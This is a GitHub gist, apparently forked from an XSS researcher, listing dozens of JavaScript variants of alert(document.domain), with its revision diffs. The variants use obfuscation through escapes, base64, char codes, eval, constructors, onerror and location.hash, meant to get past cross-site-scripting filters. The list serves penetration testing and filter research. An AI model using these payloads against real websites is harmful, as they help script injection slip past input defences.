Skip to content

Instantly share code, notes, and snippets.

@cosminpopesq
Forked from tomnomnom/alert.js
Created March 17, 2021 14:02
Show Gist options
  • Save cosminpopesq/dec8cccc0c50d62ef8c44d673aa77e45 to your computer and use it in GitHub Desktop.
Save cosminpopesq/dec8cccc0c50d62ef8c44d673aa77e45 to your computer and use it in GitHub Desktop.

Revisions

  1. @tomnomnom tomnomnom revised this gist Oct 29, 2018. 1 changed file with 3 additions and 0 deletions.
    3 changes: 3 additions & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -56,3 +56,6 @@ Function('x','alert(x)')(document.domain);
    onerror=alert;throw document.domain;
    onerror=eval;throw'=alert\x28document.domain\x29';

    // With location.hash = #alert(document.domain)
    eval(location.hash.substr(1))

  2. @tomnomnom tomnomnom revised this gist Oct 29, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -41,6 +41,7 @@ Array.of(document.domain).find(alert);

    // Evaluated
    eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));
    eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source));
    eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));
    setTimeout`alert\u0028document.domain\u0029`;
    Set.constructor`alert\x28document.domain\x29```;
  3. @tomnomnom tomnomnom revised this gist Sep 8, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -53,4 +53,5 @@ Function('x','alert(x)')(document.domain);

    // onerror assignment
    onerror=alert;throw document.domain;
    onerror=eval;throw'=alert\x28document.domain\x29';

  4. @tomnomnom tomnomnom revised this gist Sep 8, 2018. 1 changed file with 3 additions and 0 deletions.
    3 changes: 3 additions & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -51,3 +51,6 @@ Function('x','alert(x)')(document.domain);
    // Template Literal Expression
    `${alert(document.domain)}`;

    // onerror assignment
    onerror=alert;throw document.domain;

  5. @tomnomnom tomnomnom revised this gist Feb 22, 2018. 1 changed file with 24 additions and 10 deletions.
    34 changes: 24 additions & 10 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -2,6 +2,7 @@
    // Comment with more ways and I'll add them :)
    // I already know about the JSFuck way, but it's too long to add (:

    // Direct invocation
    alert(document.domain);
    (alert)(document.domain);
    al\u0065rt(document.domain);
    @@ -10,30 +11,43 @@ window['alert'](document.domain);
    top['alert'](document.domain);
    top[8680439..toString(30)](document.domain);
    top[/alert/.source](document.domain);
    alert(this['document']['domain']);

    // Indirect Invocation
    alert.call(null, document.domain);
    alert.apply(null, [document.domain]);
    alert.bind()(document.domain);
    Reflect.apply(alert, null, [document.domain]);
    alert.valueOf()(document.domain);
    with(document) alert(domain);
    Promise.all([document.domain]).then(alert);
    document.domain.replace(/.*/, alert);

    // Array methods
    [document.domain].find(alert);
    [document.domain].findIndex(alert);
    [document.domain].filter(alert);
    [document.domain].every(alert);
    [document.domain].forEach(alert);

    // Alternate array syntax (all array methods apply)
    Array(document.domain).find(alert);
    Array.of(document.domain).find(alert);
    (new Array(document.domain)).find(alert);

    // Other Datastructure Methods
    (new Map()).set(1, document.domain).forEach(alert);
    (new Set([document.domain])).forEach(alert);
    Reflect.apply(alert, null, [document.domain]);
    document.domain.replace(/.*/, alert);

    // Evaluated
    eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));
    eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));
    setTimeout`alert\u0028document.domain\u0029`;
    Set.constructor`alert\x28document.domain\x29```;
    (new Function('alert(document.domain)'))();
    (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
    `${alert(document.domain)}`;
    alert.valueOf()(document.domain);
    with(document)alert(domain);
    Function('x','alert(x)')(document.domain);
    Promise.all([document.domain]).then(alert);
    alert(this['document']['domain']);
    Array(document.domain).find(alert);
    Array.of(document.domain).find(alert);
    (new Array(document.domain)).find(alert);

    // Template Literal Expression
    `${alert(document.domain)}`;

  6. @tomnomnom tomnomnom revised this gist Feb 22, 2018. 1 changed file with 8 additions and 1 deletion.
    9 changes: 8 additions & 1 deletion alert.js
    Original file line number Diff line number Diff line change
    @@ -29,4 +29,11 @@ Set.constructor`alert\x28document.domain\x29```;
    (new Function('alert(document.domain)'))();
    (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
    `${alert(document.domain)}`;
    alert.valueOf()(document.domain)
    alert.valueOf()(document.domain);
    with(document)alert(domain);
    Function('x','alert(x)')(document.domain);
    Promise.all([document.domain]).then(alert);
    alert(this['document']['domain']);
    Array(document.domain).find(alert);
    Array.of(document.domain).find(alert);
    (new Array(document.domain)).find(alert);
  7. @tomnomnom tomnomnom revised this gist Feb 22, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -29,3 +29,4 @@ Set.constructor`alert\x28document.domain\x29```;
    (new Function('alert(document.domain)'))();
    (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
    `${alert(document.domain)}`;
    alert.valueOf()(document.domain)
  8. @tomnomnom tomnomnom revised this gist Feb 22, 2018. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -1,5 +1,6 @@
    // How many ways can you alert(document.domain)?
    // Comment with more ways and I'll add them :)
    // I already know about the JSFuck way, but it's too long to add (:

    alert(document.domain);
    (alert)(document.domain);
  9. @tomnomnom tomnomnom created this gist Feb 22, 2018.
    30 changes: 30 additions & 0 deletions alert.js
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,30 @@
    // How many ways can you alert(document.domain)?
    // Comment with more ways and I'll add them :)

    alert(document.domain);
    (alert)(document.domain);
    al\u0065rt(document.domain);
    al\u{65}rt(document.domain);
    window['alert'](document.domain);
    top['alert'](document.domain);
    top[8680439..toString(30)](document.domain);
    top[/alert/.source](document.domain);
    alert.call(null, document.domain);
    alert.apply(null, [document.domain]);
    alert.bind()(document.domain);
    [document.domain].find(alert);
    [document.domain].findIndex(alert);
    [document.domain].filter(alert);
    [document.domain].every(alert);
    [document.domain].forEach(alert);
    (new Map()).set(1, document.domain).forEach(alert);
    (new Set([document.domain])).forEach(alert);
    Reflect.apply(alert, null, [document.domain]);
    document.domain.replace(/.*/, alert);
    eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='));
    eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));
    setTimeout`alert\u0028document.domain\u0029`;
    Set.constructor`alert\x28document.domain\x29```;
    (new Function('alert(document.domain)'))();
    (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))();
    `${alert(document.domain)}`;